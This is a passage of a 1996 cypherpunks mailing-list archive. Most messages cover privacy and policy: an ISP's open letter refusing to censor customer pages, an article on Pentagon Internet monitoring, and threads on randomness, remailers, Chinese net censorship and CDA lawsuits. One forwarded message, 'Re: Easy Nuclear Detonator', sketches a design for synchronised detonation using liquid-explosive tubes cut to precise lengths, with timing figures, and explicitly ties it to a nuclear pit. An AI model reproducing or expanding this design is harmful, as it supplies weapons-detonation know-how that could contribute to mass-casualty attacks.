DNS has been around for a long time.  I'd bet that the phone company
stole the idea from the Internet... :-)

Loren

-- 
Loren J. Rittle (rittle@comm.mot.com)	PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5
Systems Technology Research (IL02/2240)	FP1024:6810D8AB3029874DD7065BC52067EAFD
Motorola, Inc.				FP2048:FDC0292446937F2A240BC07D42763672
(708) 576-7794				Call for verification of fingerprints.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 20 Feb 1996 05:12:05 +0800
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION, INC. RESPONDS TO THE SIMON WIESENTHAL CENTER
Message-ID: <199602192005.MAA01242@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release - February 20th, 1996
Contact: Sameer Parekh 510-601-9777x3

COMMUNITY CONNEXION, INC. RESPONDS TO THE SIMON WIESENTHAL CENTER

Berkeley, CA - In an open letter sent to the Simon Wiesenthal Center,
Community ConneXion, Inc., the Internet Privacy Provider, explicitly
stated its refusal to agree to their request to restrict access to
services based on the content of the web pages their customers may
implement using Community ConneXion services.

In a letter to Community ConneXion dated February 6th, the Simon
Wiesenthal Center requested that they refuse to carry messages that
"promote racism, anti-Semitism, mayhem and violence." Their target in
the request was not Usenet, the discussion forums on the Internet
which were recently targeted for censorship by CompuServe, but the
World-Wide-Web, the area of the Internet which allows anyone to serve
their words and ideas to the nearly thirty million people on the
Internet.

Efforts are growing to regulate content on the Internet and restrict
freedom of expression. Community ConneXion, Inc. is opposed to all
forms of censorship. In his response to the Simon Wiesenthal Center,
Sameer Parekh, President of Community ConneXion, issued a statement in
reply to the Center's request that Internet providers pledge to
restrict service, "Community ConneXion, Inc. considers it our civic
duty to provide Internet access, services, and privacy to any
individual or group, no matter what their political or social agenda."

The Simon Wiesenthal Center is asking Internet providers to restrict
access to individuals and groups who would use their services to
promote hateful ideas. "The answer to hateful speech is more speech,"
said Parekh, "Rather than attempting to ban hateful speech, which does
nothing to prevent the hate and the effects of hate in the long run,
human rights groups should devote their time and energies towards
positive activities, such as speaking out debunking the hate groups
and holocaust revisionists. Only by speaking out against the
hate-mongers can any progress be made. Trying to stop them from
speaking will only serve to encourage them."

The very same services that Community ConneXion refuses to censor may
be used by the persecuted groups who are harassed by the anti-Semites
and neo-Nazis to aid them to protect themselves from
persecution. "Using our services someone who may be afraid of the
neo-Nazis, perhaps because they live in a very intolerant town, may
set up web pages speaking out against the anti-Semites, but not reveal
their real name or address. In this way people can provide information
and speak out against the hate without fearing any repercussions. The
very same services which can help drive out hate are the very same
ones which the Simon Wiesenthal Center is asking Internet providers to
restrict."

Community ConneXion, Inc. is the leading provider of privacy on the
Internet. They provide anonymous and pseudonymous Internet access and
web pages in addition to powerful web service, virtual hosts, and web
design consultation. Information is available from their web pages at
http://www.c2.org/.

Attachments: Open letter to the Simon Wiesenthal Center; Community
  ConneXion, Inc. statement on the provision of services to
  controversial viewpoints

February 19, 1996
Rabbi Abraham Cooper
The Simon Wiesenthal Center
9760 West Pico Boulevard
Los Angeles, California 90035

Dear Rabbi Cooper:

	Thank you for your letter concerning the spread of unpopular
views via the Internet.
	Community ConneXion, Inc., The Internet Privacy Provider, is
not going to censor the content of its customers' Web pages. Our
statement regarding provision of services to controversial groups is
attached, as well as our official policies.
	While the reasons to not censor Internet traffic are great, we
will only describe a few of them in order to explain our
decision. First, the best way to fight speech is with more
speech. Second, it violates the fundamentals upon this country was
founded, in particular the ideal of freedom of expression. Finally, we
believe that trying to restrict harmful speech, which, for example,
"conspires against democracy," does more damage to the cause of
democracy than allowing the hateful individuals and organizations to
speak in the first place.
	In order to fight the hateful speech to which your
organization objects, it is more productive to speak out against the
hate and the lies of the anti-Semites and neo-Nazis than to try to
prevent them from speaking. By preventing them from speaking, you are
giving them more allies, and more legitimacy than they would have if
you merely spoke out against them and debunked their words. If you
actually take proactive action towards debunking their lies, people
will understand that they are actually lying. By preventing them from
speaking, you are promoting the idea that they actually might have
something valuable to say.  Hateful action, of course, should be
prosecuted to the fullest extent permissible by law.
	Second, this country was founded on the ideal of freedom of
expression. The First Amendment to the United States Constitution is
the first one on the list of the Bill of Rights. Restricting access to
freedom of expression to only people with acceptable viewpoints is not
true freedom of expression.
	Finally, and most important, restricting speech in order to
ostensibly protect democracy does more to damage democracy than to
help it. Censorship leads towards a more restrictive society, one
which grows ever more similar to the totalitarian government of the
Third Reich, which made the atrocities of the Holocaust possible. In
order to prevent such an atrocity from happening again, no government
must be allowed to gain the power over its citizens that was allowed
the Third Reich. By asking for restrictions on speech you are asking
for a return to the controls which gave the Third Reich its power.
	Therefore, we have taken a stance directly opposed to any and
all forms of censorship.  Community ConneXion, Inc. considers it our
civic duty to provide Internet access, services, and privacy to any
individual or group, no matter what their political or social
agenda. Thank you.

Sincerely,



Sameer Parekh
President
Community ConneXion, Inc.
--
Community ConneXion, Inc.
on the provision of services to those with unpopular viewpoints

The Internet is an unprecedented technological tool which for the
first time in history has democratized communications throughout the
world. It provides tens of millions of people with the tools to
communicate freely and share their ideas to an audience whose size and
diversity was previously unimagined. It is the embodiment of the
concept of an international marketplace of ideas.

As such it deserves to be encouraged and protected from those who
would restrict it. There are those who would limit the use of this
incredible power only to those with popular views. Community
ConneXion, Inc. has a First Amendment right and a moral obligation to
provide groups of all viewpoints with the ability to express their
viewpoints in an unintrusive, non-harassing manner on the Internet.

Given the unprecedented potential and scope of the Internet, Community
ConneXion, Inc. considers it our civic duty to provide Internet
access, services, and privacy to any individual or group, no matter
what their political or social agenda.



Sameer Parekh
President
Community ConneXion, Inc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 20 Feb 1996 01:36:43 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Russian Crypto Laws
Message-ID: <Pine.SUN.3.91.960219120340.23420B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know whether

1) the russians have issued any crypto licenses to either russians or
foreigners?

2) whether anyone has been prosecuted for unlicensed crypto use in
Russia?  or even been charged or warned?

[The above may have been dictated with Dragon Dictate/Win 2.0 voice 
recognition. Be alert for unintentional strange word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 20 Feb 1996 02:18:12 +0800
To: jimbell@pacifier.com
Subject: Re: Easy Nuclear Detonator
Message-ID: <01I1EB1R8QLGA0V4SL@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I would have appreciated it if you'd sent this to me privately, or at
least didn't enclose my message to you (which was sent in private email). Among
other reasons, it is rather off-topic (unless one wants to count it among bomb
information available on the net).
	-Allen


From:	IN%"jimbell@pacifier.com"  "jim bell" 19-FEB-1996 00:58:39.66

-----BEGIN PGP SIGNED MESSAGE-----

At 10:25 PM 2/18/96 EDT, E. ALLEN SMITH wrote:
>	I've been kind of busy recently (the reason I haven't responded to
>the more recent Assasination Politics stuff), but I'm curious what your method
>is for achieving simultaneous explosions.


"Multiple very thin flexible hollow tubes (1 mm ID? teflon?) filled with a
homogenous liquid 
explosive (for example, pure nitromethane), length accurately cut to produce 
the exactly desired delay.  Kept separated from each other by foam spacers 
to avoid inter-fiber detonations. Detonated from a single cap, with an 
intermediary chamber of liquid explosive to stabilize the shock front, the 
detonation wave travels along each tube simultaneously at (presumably) 
identical velocity."

It's a race, designed so that the detonation waves reach their targets (the
foci) at 
the same time.  If the detonation velocity was, say, 5,000 meters per 
second, an accuracy of 0.5 millimeter in length would produce a delay accuracy 
of 100 nanoseconds.

Whatcha think?

Now where did I put that pit...   <G>


Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSgFwvqHVDBboB2dAQGzYAQAksCklKTJ80tr+YuASwzt6KRMVgqivydf
wjYP9GL5Bo3HeXxEgOB8Xg6gnO9aOdDxMfMKiR0SdodE4V4kiy2y671jPofNz800
Y0YHzKnLcLuZzvnExGkhtLDQLigqDdNWSdPgFItkJ/5TVXHrEfL7+paOmo2hbYKO
5hbuG7wZ9Hg=
=6qoY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 20 Feb 1996 02:04:14 +0800
To: cypherpunks@toad.com
Subject: Pentagon net-trolling (from RRE)
Message-ID: <01I1EB3MZ2BEA0V4SL@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	People should find this interesting. It looks like the Pentagon, at
least publically, may be a bit behind the CIA/NSA/etcetera in Internet stuff.
	-Allen

From:	IN%"rre@weber.ucsd.edu" 19-FEB-1996 01:13:01.46

[I've removed the header, but the author's e-mail address is in the text.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



The following is an article from The Nation magazine (March 4, 1996) that
reports on a Pentagon study on how the military can exploit the Internet.
The Pentagon paper suggests using the Internet for the routine interception
of global e-mail, for covert operations and propaganda campaigns, and for
tracking domestic political activity, particularly that of the left. The
article was written by David Corn, the Washington editor of The Nation. If
you have any comments or leads for follow-up stories, please contact him at

202-546-2239/ph
202-546-1415/fx
dacor@aol.com

To subscribe to The Nation, a magazine of politics and culture, call
800-333-8536. 

Pentagon Trolls the Net
By David Corn
c1996

 Internet users beware; Pentagon snoops are taking an interest in your
cyber-communications. Last summer, Charles Swett, a policy assistant in the
Office of the Assistant Secretary of Defense for Special Operations and
Low-Intensity Conflict, produced a report  that assessed the intelligence
value of the Internet for the Defense Department. His study discovered the
obvious: By monitoring computer message traffic and alternative news sources
from around the world, the military might catch "early warning of impending
significant developments." Swett reports that the "Internet could also be
used offensively as an additional medium in psychological operations
campaigns and to help achieve unconventional warfare objectives." A striking
aspect of his study is that there is one sort of Internet user who attracts a
large amount of attention from Swett: cyber-smart lefties.
   The thirty-one-page, unclassified study is mostly cut and dry. Much of it
describes what the Internet is and what can be found within its infinite
confines. Swett lists various "fringe groups" that are exploiting the
Internet: the white-supremacist National Alliance, the Michigan Militia,
Earth First, and People for the Ethical Treatment of Animals (PETA). He
highlights MUFON--the Mutual UFO Network--which uses the Internet to
disseminate information on "U.S. military operations that members believe
relate to investigations and cover-ups of UFO-related incidents." MUFON
computer messages, Swett notes, "contain details on MUFON's efforts to
conduct surveillance of DoD installations." The report does not suggest that
the computer communications of MUFON and these other groups should be
targeted by the military--though X Filers will be forgiven for wondering if
something sinister is afoot.
   What Swett apparently finds of greater interest than MUFON and the "fringe
groups" is the online left. A significant portion of the report is devoted to
the San Francisco-based Institute for Global Communications, which operates
several computer networks, such as PeaceNet and EcoNet, that are used by
progressive activists. I.G.C. demonstrates, he writes, "the breadth of
DoD-relevant information available on the Internet." The paper refers to
I.G.C. conferences that might be considered noteworthy by the Pentagon,
including ones on anti-nuclear arms campaigns, the extreme right, social
change, and "multicultural, multi-racial news." Swett cites I.G.C. as the
home for "alternative news sources" that fill gaps in the mainstream media.
(It might be good for Pentagon analysts to read I.G.C. dispatches from
Holland's Peace Media Service.) Yet he seems to say that one can  also track
the left around the world by monitoring I.G.C.: "Although [I.G.C.] is clearly
a left-wing political organization, without actually joining I.G.C. and
reading its message traffic, it is difficult to assess the nature and extent
of its members' actual real-world activities."
 Swett's paper presents the world of opportunity awaiting a cyber-shrewd
military and intelligence establishment. The Pentagon and intelligence
services will conduct "routine monitoring of messages originating in other
countries" in the search for information on "developing security threats."
That means overseas e-mail, like overseas phonecalls, will be intercepted by
the electronic eavesdroppers of the National Security Agency or some other
outfit. The data will be fed into filtering computers and then, if it
contains any hot-button words, forwarded to the appropriate analyst.
"Networks of human sources with access to the Internet could be developed in
areas of security concern to the U.S." (But bureaucrats rest assured; "this
approach"--using computer-assisted spies--"could never replace official DoD
intelligence collection systems or services.") The Internet "can also serve
counterintelligence purposes" by identifying threats to the Pentagon and U.S.
intelligence activities. As an example, Swett refers to a message posted in a
discussion group for "left-wing political activists" that repeated an A.P.
article about an upcoming U.S. Army Special Operations Command training
exercise at an empty Miami Beach hotel.
 Another growth area is the dirty tracks department. Noting that government
officials, military officials, business people, and journalists all around
the world are online, Swett envisions "Psychological Operations" campaigns in
which U.S. propaganda could be rapidly disseminated to a wide audience. He
adds, "The U.S. might be able to employ the Internet offensively to help
achieve unconventional warfare objectives." Swett does not delve into details
on how the Internet could serve such a mission. But he tosses out one
possibility: communicating via the Internet with political and paramilitary
groups abroad that Washington wants to assist while "limiting the direct
political involvement of the United States." Imagine this: contras with
computers.
 Swett does point to a few potential problems. The Internet is chockful of
chit-chat of no intelligence value. Retrieving useful nuggets will require
monumental screening. He also predicts that one day video footage of military
operations will be captured by inexpensive, hand-held digital video cameras
operated by local individuals and then up-loaded to the Internet. Within
minutes, millions of people around the world will see for themselves what has
happened--which could lead to calls for action (or calls to terminate action)
before government leaders have had a chance to react and formulate a
position. Such a development, he observes, "will greatly add to the burden on
military commanders, whose actions will be subjected to an unprecedented
degree of scrutiny." And opponents of the Pentagon might try to exploit the
Internet for their own devilish ends: "If it became widely known that DoD
were monitoring Internet traffic for intelligence or counterintelligence
purposes,  individuals with personal agendas or political purposes in mind,
or who enjoy playing pranks, would deliberately enter false or misleading
messages." The study ends with a series of vague recommendations--all to be
carried out "only in full compliance with the letter and the spirit of the
law, and without violating the privacy of American citizens." 
 The Swett paper is "refreshingly candid," says Steven Aftergood of the
Federation of American Scientists, who placed a copy of the document on the
FAS web site on government secrecy, where it is being downloaded about twenty
times a day (at http://www.fas.org/pub/gen/fas/sgp/.).  The I.G.C. staff is
amused by Swett's interest. "We must be doing something right," notes George
Gundrey, program coordinator of I.G.C.'s PeaceNet. "But it is interesting
that all of his [I.G.C.] examples are the most left-wing items [on the
network]." 
 Swett's study is not the first of its kind. Under the rubric of "information
warfare," other Pentagon outfits and military contractors have studied how to
use computer networks to collect public information, disseminate propaganda,
politically destabilize other governments, and plant computer viruses into
the information systems of foes. (The latter task is particularly foolhardy.
Deploying viruses into cyber-space--even if targeted against an enemy--would
likely pose a danger to the United States, since this country is more
networked than any other.) But Swett's office--the Pentagon's dirty tricks
shop--is a newcomer to this scene, acoording to David Banisar, a policy
analyst for the Electronic Privacy Information Center. Banisar's group has
been helping international human rights groups use encryption to protect
their global e-mai, "so the spooks don't listen in"
 It is natural that the national security gang will try to infiltrate and use
a communication medium like the Internet to its advantage. What is most
troubling about Swett's paper is its preoccupation with left-of-center
travelers in cyberspace and _domestic_ political activities. In the appendix,
Swett reproduces four examples of notable e-mail. One (written by progressive
activists Richard Cloward and Frances Fox Piven) calls for 100 days of
protest in response to the Republican's Contract with America, another
announces plans for a demonstration at the 1996 G.O.P. convention in San
Diego, the third relays to lefties information on the U.S. Army exercise at
the Miami Beach hotel, and the last is a communique from the Zapatistas of
Mexico. Swett's use of these cyber dispatches can be explained one of two
ways. Either the left has made much more progress in cyber-organizing than
the right and "such fringe groups" as PETA, or Swett, true to institutional
tradition, is overwrought about the use of the Internet by a certain parties.
In any case, the would-be watchers in the defense establishment ought to be
watched closely--especially if Swett's report refelcts broader sentiment
within the Pentagon.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 20 Feb 1996 01:57:50 +0800
To: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC,   Canada))
Subject: Re: Patents and Trademarks invalid
In-Reply-To: <9602170607.AA15430@cti02.citenet.net>
Message-ID: <199602191722.MAA06585@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This isn't AynRandPunks either, Mr. Avon.

.pm

Jean-Francois Avon (JFA Technologies, QC, Canada) writes:
> Man's survival tool is his mind.
> 
> Patents and copyright are establishing the ownership and protection
> the result of the exercise of his survival tool.
> 
> Therefore they are good.
> 
> To try to eliminate them is equivalent to promote slavery.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 20 Feb 1996 02:48:50 +0800
To: tallpaul@pipeline.com
Subject: Re: Should *WE* Sue Under CDA
Message-ID: <01I1EBV48X2UA0V4SL@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tallpaul@pipeline.com" 19-FEB-1996 08:49:19.72

>On a personal and emotional level I *love* the idea of watching a group of
>pro-CDA fundie christers having to sweat in court explaining how their
>support for things like incest and murder are protected under the First
>Amendment but other people's speech is not. 

	It is a rather humorous idea.

>But on a logical level, should we use (or advocate) the court system under
>CDA-related topics. 
 
>I think not. 
 
>Allen's post has great emotional appeal, but it creates at least one
>danger. 
 
>The first is the hypocrisy involved in advocating something with which we
>disagree, like asking the courts to support CDA and use CDA to punish those
>we don't like. 

	That does have its problems. I've got the same sort of dilemma in my
life; to take government funding (for science) or not, when I disapprove of
most such funding. I wind up deciding to, because otherwise the funds in
question could be spent less efficiently on science (thus further wasting
taxpayer funds) or on something even less legitimate (i.e., the Wo(S)D), given
that bureaucratic budgets tend to be decided by who uses up the most money.
	I can justify this by that one would pick a target that had done
something directly wrong: participating in the writing of a bill that violates
individual rights. In other words, pick a target that deserves it enough, and
striking back at them is justified. The problem is the old ends justify means
debate.
 
>The second is creating an Orwellian doublethink in politics where we first
>advocate something, like useing the courts. Then, when challenged (about
>hypocrisy or anything else) turn around and state that we really did not
>adovate what we so clearly did advocate or that we did not "mean" what we
>so clearly said. 
 
>Ultimately, we reinforce a form of political behavior where nobody is
>responsible for their political behavior and nobody expects to be held
>accountable for it. 
 
>Witness the behavior of people like Rep. Shroeder who voted for CDA etc.
>including the anti-abortion aspects, but does not want this to count among
>the pro-choice crowd because she didn't "really" vote for CDA etc. to get
>it to limit abortions. 

	You have a point.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 20 Feb 1996 02:56:44 +0800
To: maruishi@netcom.com
Subject: Re: True random numbers
In-Reply-To: <199602172002.MAA09152@netcom20.netcom.com>
Message-ID: <199602191809.NAA06677@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



maruishi@netcom.com writes:
> I was trying to think of a way to come up with true random numbers...
> And knowing a bit of UNIX socket TCP/IP programming I made a small little
> program that generates random numbers by measuring the mili-second timing ies
> a TCP packet to bounce back, from another network. 

A bad source of randomness, both because the opponent can also conduct
the same measurement and because the opponent can alter your
measurement...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@GS160.SP.CS.CMU.EDU
Date: Tue, 20 Feb 1996 03:07:43 +0800
To: cypherpunks@toad.com
Subject: Re: True random numbers
In-Reply-To: <+cmu.andrew.internet.cypherpunks+kl9Y:mm00UfAI100wG@andrew.cmu.edu>
Message-ID: <9602191812.AA07312@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
>4. I'd avoid altogether phrases such as "generates random numbers," unless
>your method uses radioactive decay or Johnson noise measurements, for
>example, and maybe not even then.

Persi Diaconis gave a talk here last week on pseudorandom generation,
during which he was asked by people didn't use hardware RNGs.  He said
that he wasn't aware of any that passed the standard battery of
statistical tests.

(He also mentioned that nobody had thoroughly tested the
complexity-theoretic generators such as Blum-Micali, and got into a
rather vigorous discussion with a professor who argued that testing
was superfluous.  Diaconis: "You theorists always take that tone!")

-- 
. Eli Brandt                                        usual disclaimers .
. eli+@cs.cmu.edu                                  PGP key on request .
. arrest me:                       violation of 18 U.S.C. 1462: "fuck".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 20 Feb 1996 06:50:13 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers not heard from; info?
Message-ID: <2.2.32.19960219213114.006a3f04@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:25 PM 2/19/96 -0500, Dave Mandl wrote:
>
>I know that there's no sure-fire way to find signatures that aren't
>prefixed by, say "--", but that's better than nothing.

A fix along the lines of

::
don't-send-anything-after-this

might be readily applicable.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 20 Feb 1996 07:40:34 +0800
To: cypherpunks@toad.com
Subject: Net Partying Last Week?
Message-ID: <2.2.32.19960219215923.006c3540@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm noticing something odd in the course of my remailer tests. There's an
across-the-board increase in turnaround times for Sunday/Monday as compared
with Friday/Saturday. Was there some remailer cyberbash I don't know about,
or was this more likely to be a local problem?

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 20 Feb 1996 07:39:18 +0800
To: cypherpunks@toad.com
Subject: Re: Some thoughts on the Chinese Net
Message-ID: <2.2.32.19960219221817.006ce4a8@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:44 PM 2/19/96 -0600, Alex Strasheim <cp@proust.suba.com> wrote:

>steady force towards liberalization.  Once Chineese society has coexisted
>with a vibrant black information market for a decade or two, making 
>things legal will probably seem sensible to most people -- no one will 
>expect the sky to fall if people are allowed to speak their minds.

I'd like to agree, but I'm afraid I can't. Notice that many years of
widespread use of currently illegal drugs in the US has not translated into
widespread willingness to say that the drugs should be legal. Nor has the
experience of decades of black markets turned into widespread Russian
willingness to allow a lot more freedom: what they call "profiteering" and
punish heavily is mostly what we call "wholesaling" and regard as an
essential part of mundane distribution.

Cognitive dissonance is really, really easy to come by, and hard to remove. 

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 20 Feb 1996 04:35:20 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Some thoughts on the Chinese Net
In-Reply-To: <199602181745.JAA08925@ix5.ix.netcom.com>
Message-ID: <199602191921.OAA07056@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:
> >They could use no stock software, and they would grind every machine
> >in the country to its knees doing the signatures. RSA signatures
> >aren't cheap.
> 
> Could you use IPv6 / IPSP authentication to do the job?

Yes, they could. (Its IPSEC these days, by the way).

However, again, I don't think it will do them much good, especially
since forcing people to deploy strong cryptography everywhere isn't
in their best interests. They could try only doing the AH part of the
protocol, of course, but even then, using forged, stolen, or otherwise
ingenuine credentials isn't that hard. Crypto isn't a panacea, and if
you can't trust both endpoints its hard to trust the crypto itself...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 20 Feb 1996 04:42:33 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: PING packets illegal?
In-Reply-To: <199602181819.NAA10431@homeport.org>
Message-ID: <199602191922.OAA07064@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> | If you want to really abuse the protocols, 53 bytes probably fits into the
> | 64 you can send in a ping, so you could implement ATM-over-ICMP :-)
> 
> Err, you can put up to 1500 bytes into an ICMP echo request, if its
> properly implemented.

IP datagrams will store up to 64k (including headers). 1500 bytes is
just a common MTU, but with fragmentation that needn't be a limit.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Stumbles <J.D.Stumbles@reading.ac.uk>
Date: Tue, 20 Feb 1996 00:51:25 +0800
To: cypherpunks <sasha1@netcom.com>
Subject: Re: CPF: Feb-17-1996.cpf
In-Reply-To: <199602170527.AAA20807@yakko.cs.wmich.edu>
Message-ID: <Pine.SOL.3.91.960219141852.9260F-100000@suma3.reading.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Feb 1996, Damaged Justice wrote:

> Date: Fri, 16 Feb 1996 09:20:30 -0800
> From: sasha1@netcom.com (Alexander Chislenko)
> Subject: Re:  Computer unmasks Anonymous writer...
> 
>   I ran my essays through Word grammar checker a while ago,
> and was surprised how stable the grammar statistics were.
> Complexity of the text (grade level) was the same to the decimal point,
> average length of sentences was consistent, etc.
> People also use the same styles of smileys or *highlights*, make
> consistent spelling errors, have their habits of indentation, etc.
> 
> My suggestion at the time was to have randomizing output filter that
> would substitute synonyms, change spelling, modify paragraph formatting,
> etc.  - Style anonymizer, I'd call it.  Also, if small random changes are
> applied to every copy of the message you send out, and you keep track of
> what recipient got which version, you will find it easier to identify
> the leaks if you send private messages.  A dishonest recipient, to
> protect himself, would have to further randomize the message, which
> has apparent consequences for the ease of your identification and attributability of the message.

A similar method was (is?) allegedly used by H.M. Government depts (and no
doubt others) in restricted documents: the apparently even spacing of
letters along a line to acheive proportional spacing was in fact slightly
uneven and different on each copy, so a whistleblower (or spy) who
photocopied and leaked a document in their posession could be identified
if the copied document were examined. 


--
John Stumbles                                      j.d.stumbles@reading.ac.uk
Computer Services, University of Reading       http://www.rdg.ac.uk/~suqstmbl 
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Just pray that there's intelligent life somewhere out in space
 - because there's bugger all down here on earth!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Tue, 20 Feb 1996 04:30:39 +0800
To: cypherpunks@toad.com
Subject: Encryption in software licenses...
Message-ID: <199602191923.OAA23820@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have a pointer to any good discussions on how to build programs
with encrypted license keys?  ftp.csua.berkeley.edu used to have such a file
(/pub/cypherpunks/cryptanalysis/license.asc.gz), but the archive hasn't
been accessible for a few days.  Although I remember this to be mostly about 
how to crack such schemes, it has lots of useful information about how they
are designed in the first place.

	Thanks,
	  David

-- 
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@kiwi.cs.berkeley.edu>
Date: Tue, 20 Feb 1996 07:59:45 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers not heard from; info?
In-Reply-To: <2.2.32.19960219213114.006a3f04@mail.aracnet.com>
Message-ID: <199602192239.OAA31378@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Baugh wrote:
> A fix along the lines of
>
> ::
> don't-send-anything-after-this
>
> might be readily applicable.

   This is simply the "cut" feature of remailers, which is already
implemented.

   In response to your question about preserving subject headers,
there are actually three different behaviors. The default is to
preserve the subject header if the input message is not encrypted,
otherwise to discard it. The other two behaviors (nsub and ksub) are
to preserve or discard the subject header, respectively. I do not
recommend nsub, because it is allows tracing a message through the
subject header. No currently operational remailers have nsub behavior.

   In response to your question about remailers which haven't
responded to your tests, remail@c2.org is quite functional. I have no
idea why it did not respond. The other remailers are no longer
functional. In general, when I take a remailer off the page, it is
because it has been non-functional a few weeks, when the remailer
operator announces that it will be taken offline, or (temporarily)
when I know that the remailer will be unavailable or unreliable for a
while. There may be publicly known functioning remailers which are not
on my list, but I rather tend to doubt it.

   In general, I applaud independent work confirming or confronting my
remailer-list, but I ask that you please RTFM before doing things like
suggesting new features.

ObNoise: do any of our resident lawyers have any idea whether "RTFM"
is indecent?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 20 Feb 1996 05:51:05 +0800
To: cypherpunks@toad.com
Subject: Re: Some thoughts on the Chinese Net
In-Reply-To: <199602191921.OAA07056@jekyll.piermont.com>
Message-ID: <199602192044.OAA28265@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> However, again, I don't think it will do them much good, especially
> since forcing people to deploy strong cryptography everywhere isn't
> in their best interests. They could try only doing the AH part of the
> protocol, of course, but even then, using forged, stolen, or otherwise
> ingenuine credentials isn't that hard. Crypto isn't a panacea, and if
> you can't trust both endpoints its hard to trust the crypto itself...

It seems to me that the actual result of the Chineese experiment in net
censorship will probably be something in between what the Communist
government is hoping for and what some hard line crypto anarchists are
predicting.  Nets and good crypto tools aren't going to make it possible
for everyone in China with a pc to discuss any subject without fear of
government reprisal, but the new technology will almost certainly result
in a significant loss of control for the state. 

Censorship will persist in China, but evading it will be easier and safer
than it is now.  Nets being what they are, it will be easier for people to
